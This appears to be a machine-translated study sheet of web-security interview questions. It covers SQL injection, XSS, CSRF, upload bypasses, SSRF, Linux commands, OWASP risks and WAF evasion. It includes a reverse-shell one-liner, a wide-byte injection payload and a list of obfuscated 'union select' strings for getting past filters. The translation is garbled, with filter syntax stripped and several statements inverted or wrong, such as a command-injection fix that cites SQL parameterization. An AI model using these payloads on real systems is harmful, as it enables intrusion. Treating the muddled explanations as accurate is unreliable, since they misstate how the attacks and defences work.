SQL Injection
Injection vulnerability principle
Attackers exploitWeb ApplicationsVulnerability and flaw in building dynamic SQL query, insert it into the user input fieldMalicious code, trick the database into executing SQL commands, thereby stealing, tampering or destroying various sensitive data, and even executing dangerous system-level commands on the database host.
Injection protection
1. Escape the input special characters
2. Use whitelists to normalize input verification methods
3. Control the client input, and do not allow input SQL injection related special characters.
4. The server side submits the database to performSQL QueryPreviously, special characters were filtered, escaped, replaced, and deleted.
Injection type
Joint injection:
Merge the results of multiple SELECT statements into a result set
Boolean blinds:
The web page will only return True and False, so the Boolean blind call is to obtain relevant information in the database based on the True or False returned by the page.
Common functions:
ANDandOR: Used to construct a Boolean expression to determine whether the condition is true.
LEFT()andRIGHT(): Used to extract the specified length of the string from left or right.
LENGTH()orLEN(): Used to get the length of a string, for easy character-by-character enumeration.
Time blind note:
The general idea of time blind injection is delay injection, which is to use functions such as sleep() or benchmark() to makemysqlThe execution time becomes longer and the conditional statement if (expr1,expr2,expr3) is determined by the response time of the page, and then the value returned by the statement is True or False, thereby guessing some unknown fields.
Wide byte injection:
Wide byte injection is a feature of mysql. When using GBK encoding, it will be considered that two characters are a Chinese character.
The encoding in PHP is GBK, the function execution adds ASCI encoding, the default character set of MYSOL is GBK, etc.
Usually, I will enter id=1' or id=1' for testing in SQL injection. If the database filtering is not strict, an error will occur. Wide byte injection will be added before '. After adding the backslash, it will play an escape role. In this way, the existing ' will lose the injection function.
I use the principle of wide injection and enter id=1%df' and an error will occur on the page. This is because the GBK encoding believes that a Chinese character occupies two bytes, the url encoding of \ is %5C, plus %df, the first two characters will be spliced into %df%5c and are recognized as a Chinese character. In this way, \ disappears automatically and the escape effect fails here. The reconstructed Chinese character is called a Chinese character that exists in real life but cannot be easily recognized by the browser.
In theory, %df is not necessary. %81 and %a1 can also be achieved after testing. As long as you can reconstruct a Chinese character that is real and cannot be well recognized by the browser, and the encoding can contain characters that invalidate %5c.
XSS
principle
Reflective type:
Code can be constructed in the data submitted by the user to execute, thereby realizing attacks such as stealing user information. You need to induce users to "click" a malicious link to successfully attack
Storage type:
Storage XSS will "storage" the data entered by the user on the server side. This XSS has strong stability.
DOM type:
The XSS formed by modifying the DOM node of the page is called DOM Based XSS.
The difference between type and reflective type
Reflective XSS: XSS is triggered by inducing users to click and the malicious payload we construct. Reflective XSS detection. Every time we request a link with payload, the page should have specific malformed data. DOM type: XSS formed by modifying the DOM node of the page. DOM-based XSS is an XSS generated by dom operations through js code, so we may not even get the corresponding malformed data in the request response. The fundamental difference in my opinion is the difference in output points.
CSRF
1. Principle
CSRF is a cross-site request forgery attack, initiated by the client, because there is no confirmation of whether the user voluntarily initiated by the user when the critical operation is executed.
2. Defense
- Verify Referer
- Add token
If you compare horizontally with referer, who has a higher security level?
The token security level is higher, because not any server can obtain a referer. If you jump from HTTPS to HTTP, you will not send a referer. And some versions of FLASH can customize referer. However, if you want token, you must ensure that it is random enough and cannot be disclosed. (Principle of Unpredictability)
4. From what perspective does referer verification from? If done, how to eliminate the problem
Verification of referer in header is one is an empty referer and the other is referer filtering or incomplete detection. In order to eliminate this problem, the regular rules should be written and improved in the verification whitelist.
5. For tokens, what aspects will be paid attention to when testing tokens and which aspects of tokens will be tested?
-
Attacks against tokens are: first, attacks on itself, replay tests at one time, analyze encryption rules, verify whether the verification method is correct, etc., and second, obtaining them in combination with information leakage vulnerabilities, and launching a combination attack.
-
Information leakage may be cache, log,get, it may also be to use cross-site
-
Many jump login rely on tokens. There is a jump vulnerability plus reflective cross-sites to combine it into login hijacking.
-
In addition, you can also describe the security of tokens and how they are bypassed by poor design, such as red envelope grabbing services.
File upload vulnerability
1. Principle
Due to insufficient control or processing defects in the uploading part of the user's file, the user can upload executable dynamic script files to the server through his own permissions.
2. Common upload bypass methods
- Front-end js verification: Disable js/burp package modification
- Caps
- Double suffix name
- Filter bypass pphphp->php
3. Protection
- The file upload directory is set to non-executable
- Use whitelist to determine file upload type
- Rewrite file name and path with random numbers
4. What is the point of reviewing elements of upload points?
The limitations of upload file types of some sites are implemented on the front-end, and at this time, just add the upload type to break through the limit.
SSRF
SSRF(Server-Side Request Forgery: Server-side request forgery) is a security vulnerability constructed by an attacker to initiate requests by the server. Generally speaking, the target of an SSRF attack is an internal system that cannot be accessed from the external network. (It is precisely because it is initiated by the server that it can request an internal system connected to it and isolated from the external network)
The reason for the formation of SSRF is mostly because the server provides the function of obtaining data from other server applications and does not filter or restrict the target address. For example, obtain the web page text content from the specified URL address, load the pictures of the specified address, download, etc.
1. Detection
How to verify SSRF vulnerability:
1) Because the SSRF vulnerability is a security vulnerability that allows the server to send requests, we can analyze whether the sent request is sent by the server by capturing packets, so as to determine whether the SSRF vulnerability exists.
2) Look for the accessed resource address in the page source code, if the resource address type is/?image=(address) may have SSRF vulnerability
Causes of vulnerabilities Defense Bypass
Cause: The simulated server requests other server resources without legality verification. Utilization: Construct malicious intranet IP for detection, or use other supported protocols to attack other services. Defense: prohibit jumping, restriction of protocols, internal and external network restrictions, and URL restrictions. Bypass: Use different protocols, bypass for IP, IP format, add other characters to URLs, malicious URLs, etc. 301 jump + dns rebindding.
No echo, how to operate
The reason is the same as RCE without echoing, two solutions:
Reverse connection (generally SSRF uses this reverse connection method because SSRF cannot write files): Let the target that is suspected to have RCE (SSRF) request an external website, dnslog or use vps python to enable a web service. When dnslog or self-enabled website can receive request information, it does not mean that the target has RCE (SSRF))
Linux
1. Check what commands are currently connected to the port?netstatandssDifferences and advantages and disadvantages of commands
netstat -antp` `ss -l
The advantage of ss is that it can display more and more detailed information about TCP and connection status, and it is faster and more efficient than netstat.
2. Common commands for rebounding shells? Which shell does it usually rebound? Why?
bash -i>&/dev/tcp//4444 0>&1
3. What information can be obtained through the /proc directory of the Linux system, and what security applications can this information be used?
ls /proc
System information,hardwareInformation, kernel version, loaded module, process
In the system, detecting the configuration items of the configuration files can improve the security of SSH.
/etc/ssh/sshd___configiptables configuration
5. How to view the last hundred lines of the file content by a command
tail -n 100 filename6. How to view Linux processes
(1) ps:(Process Status). Get is the current process state that is fetched when executing the command, and does not change dynamically, the current process; the ps command is a very powerful process viewing command. Use this command to determine which processes are running and running states, whether the process is over, whether the process is dead, which processes occupy too much resources, etc. In short, most of the information can be obtained by executing the command.
(2) pstree//C to view the process according to the tree type -c to display PID. The root node of the tree is pid or init. If a username is specified, the process tree will take the process owned by the user as the root node. For example, a loop fork function, we can view the process of the tree through pstree;
(3) pgrep firefox//View process ID by process name
(4) ps -ef|grep defunc A common combination of ps and grep can find specific processes. At this time, you can find the zombie process.
(5) top //top is dynamically changing with time, somewhat similar towindowsThe task manager in the real-time display; press q to exit, press h to enter help;
7. How to view threads
The specific usage is top -H plus this option, and each line of top does not display a process, but a thread.
top -H
TOP 10 Vulnerabilities
The TOP 10 vulnerabilities are the most common cybersecurity vulnerabilities released by OWASP (Open Web Application Security Project) every year. The following is a description of the TOP 10 vulnerabilities, their principles, detection methods and repair measures.
1) SQL injection vulnerability
Principle: The attacker injects malicious SQL statements into the application's database by constructing malicious SQL statements to obtain sensitive information or control the database server.
Detection method: Use tools or manually enter special characters and observe whether there is an exception response.
Fixing measures: Use parameterized queries and stored procedures to strictly checksum filter user input to prevent SQL injection attacks.
2) XSS (cross-site scripting attack) vulnerability
Principle: The attacker inserts malicious code into the web page and uses the browser to execute these codes to steal user information or conduct other attacks.
Detection method: Use tools or manually enter special characters in the input box and check whether there is an exception response.
Fixing measures: Filter or escape the content of all input and output to achieve security of input and output.
3) CSRF (cross-site request forgery) vulnerability
Principle: The attacker uses the victim's identity to perform malicious operations on the application by initiating a forged request on the victim's browser.
Detection method: Use tools or manually simulate the request and check whether it is recognized.
Fixing measures: Use token or random number as the identity authentication code, and effectively identify the source requests to prevent CSRF attacks.
4) RCE (remote code execution) vulnerability
Principle: An attacker executes arbitrary code on the target server by including malicious serialized objects or error implementations on the computer's network protocol stack.
Detection method: Use tools to scan or manually test possible input points to try to construct malicious requests and observe whether there is an exception response.
Fixing measures: Restrict code execution permissions, strengthen security verification, disable dangerous functions, and restrict remote service access permissions.
5) Unauthorized access vulnerability
Principle: The application does not properly implement permission control, allowing attackers to access and perform sensitive operations that should not be licensed.
Detection method: Manually test whether different roles can access operations that should not be allowed.
Fixing measures: Modify application code, add identity authentication and permission control mechanisms, and change the default password in a timely manner.
6) XML external entity injection vulnerability
Principle: The attacker injects external entity references into the XML processor to obtain sensitive information or exploit business logic vulnerabilities.
Detection method: Simulate an attack and check whether there are injectable vulnerabilities in the code.
Fixing measures: It is prohibited to use parsing external entities, strictly verify the input data, and upgrade the library version to support it.
7) Command injection vulnerability
Principle: An attacker attacks by inserting parameters containing malicious instructions into the application, thereby enabling remote execution of commands and obtaining server permissions.
Detection method: Use tools or manually enter special characters and observe whether there is an exception response.
Fixing measures: Use parameterized queries instead of spliced SQL statements, and strictly filter and escape user input. It is recommended to use sandbox technology, restrict system command line settings, etc. to prevent command injection attacks.
8) Password guessing vulnerability
Principle: The attacker attempts to guess the user's password by enumerating passwords or social engineering methods, thereby obtaining sensitive information or controlling an account.
Detection method: Evaluate whether the password policy is valid.
Fixing measures: Set complex password policies, increase the limit on the number of failed login attempts, and enable two-step verification and other measures.
9) Unsafe deserialization vulnerability
Principle: An attacker executes unauthorized code and affects the application by sending carefully constructed serialized objects.
Detection method: Application code review, mastering deserialization paths that may be attacked.
Fixing measures: It is prohibited to load objects from unknown sources, and restrict deserialization types by adding whitelist/blacklist, which needs to be carefully considered in actual scenarios.
10) Component not updated vulnerability
Principle: Component unupdated vulnerabilities refer to the use of third-party components or libraries known to exist in an application or system. Attackers may exploit these vulnerabilities in components to attack and invade the system.
Detection method:
Manual detection: View applications, plugins, libraries, and operating system versions directly and compare them with publicly known vulnerability databases.
Automated scanning: Use third-party vulnerability scanning tools to discover known component vulnerabilities in your application or system.
Fixed:
Check and update: Record and evaluate components and replace known vulnerability components in a timely manner.
Monitor vulnerabilities: Regularly rolling the use of components, maintain appropriate upgrade plans, and promptly detect vulnerabilities and patches.
Installing new versions: Download and install the latest versions of third-party components, usually these versions fix vulnerabilities in previous versions.
Code audit: Pass the componentsource codeanalysis and audit to check for other vulnerabilities and provide data support for necessary updates.
Network isolation: Network isolation technology or virtual containers can be used to reduce the impact of external components on an application or system.
Take a try
"Direction" usually refers to collecting information about the target system by performing various tests and scans on it in order to evaluate its security and potential vulnerabilities.
Here are the commonly used tips:
Port Scan: Use a port scanning tool such as Nmap to detect open ports and running services on the target system.
Operating system fingerprint recognition: Use operating system recognition tools (such as P0f) to determine the operating system type and version of the target system running.
Application fingerprint recognition: Use application recognition tools (such as Wappalyzer) to discover information about running web applications, frameworks, libraries, etc. in the target system.
Vulnerability Scan: Use a vulnerability scanner (such as OpenVAS or Nessus) to automatically check for possible vulnerabilities or security threats on the target system.
Social Engineering Attack: Use social engineering attack techniques to disguise themselves as legitimate users to obtain access or sensitive information on the target system.
Password guessing: Use password cracking tools such as John the Ripper or HashCat to guess usernames and passwords to gain unauthorized access.
Worm Attack: Use known vulnerabilities to construct worm attack code, automatically spread and infect target networks to gain more access and control.
Bypass waf
WAF interception principle: WAF matches sensitive characters from the rule base for interception.
Keyword case bypass
Some WAFs only match pure uppercase or pure lowercase characters due to rule design, and ignore character uppercase and lowercase confusion. At this time, we can use this to bypass it.
List: union select ---> unIOn SeLEcT
Encoding bypass
Character encoding for WAF filtering, such as URL encoding, Unicode encoding, hex encoding, Hex encoding, etc.
List: union select 1,2,3# =union%0aselect 1\u002c2,3%23
Double write bypass
Some WAFs only recognize strings once, delete sensitive fields and splice remaining statements. At this time, we can bypass them by double writing.
Listed: UNIunionON, SELselectECT anandd
Line break (\N) bypass
List: select * from admin where username = \N union select 1,user() from admin
Comment inline comments bypass:
/XXX/,#, -- -,--+, ;
union selecte =/!union/ select
Synonym substitution
and=&&
or=||
=(equal to the sign)=<,>
Spaces cannot be used =%09,%0a,%0b,%0c,%0d,%20,%a0, etc.
Note: %0a is a newline, and can also replace spaces.
Traffic Analysis
Wireshark simple filtering rules
Filter ip:
Filter source ip address:==1.1.1.1;, Destination IP address:==1.1.1.1;
Filter port:
Filter port 80:==80, Source port:==80, Destination port:==80
Protocol filtering:
Just enter the protocol name directly, such as http protocolhttp
http mode filtering:
Filter get/post packages=="GET/POST"
Crawler ideas
1. What crawler frameworks or modules have you used? Pros and cons?
Scrapy is an application framework written to crawl website data and extract structured data. Can be applied in includingData Mining, information processing or storing historical data in a series of programs. . Use this framework to easily climb down data such as Amazon product information.
2. How to solve the problem of restricting IP, cookies, and sessions at the same time
To solve the problem of restricting IP, you can use proxy IP address pools and servers; if dynamic crawling is not applicable, you can use decompiled JS files to obtain the corresponding files, or use other platforms (such as mobile phones) to see if you can obtain the corresponding json files.
Expired processing issues?
At this time, cookies need to be updated automatically. How do I usually update cookies automatically? Selenium will be used here.
Step 1. Use selenium to automatically log in to obtain cookies and save them to file;
Step 2. Read the cookie and compare the validity period of the cookie. If it expires, execute Step 1 again;
Step 3. When requesting other web pages, fill in the cookie to maintain the login status.